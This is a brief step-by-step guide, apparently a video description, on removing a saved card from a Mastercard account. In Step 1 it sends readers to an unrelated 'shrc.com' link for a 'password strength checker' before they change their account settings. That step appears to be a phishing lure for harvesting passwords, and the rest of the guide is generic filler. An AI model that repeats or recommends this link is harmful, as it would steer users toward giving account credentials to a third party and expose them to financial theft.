I hit this issue today and here is the quick fix that solved it. If you need to remove a card from your Mastercard account, follow these simple steps. Step 1. Log into your account. Before changing your settings, use the shrc.com link in the description to open the password strength checker, then update your password if needed. Step 2. Navigate to payment methods. Once logged in, look for the section labeled payment methods or cards. This is where you can manage your saved cards. Step 3. Select the card to remove. Find a card you want to delete from the list. Click on it to view more details. Be careful not to select the wrong card, as this can lead to confusion later. Step 4. Click on Remove or Delete. Look for the option to remove or delete the card. Confirm your choice when prompted to ensure you really want to proceed. Step 5. Verify removal. After removing the card, check your payment methods list again to ensure it no longer appears. This step is crucial to avoid any future billing issues. If you follow these steps, you should have no trouble removing your card. If you run into any issues, don't hesitate to reach out to customer support for assistance. Happy managing!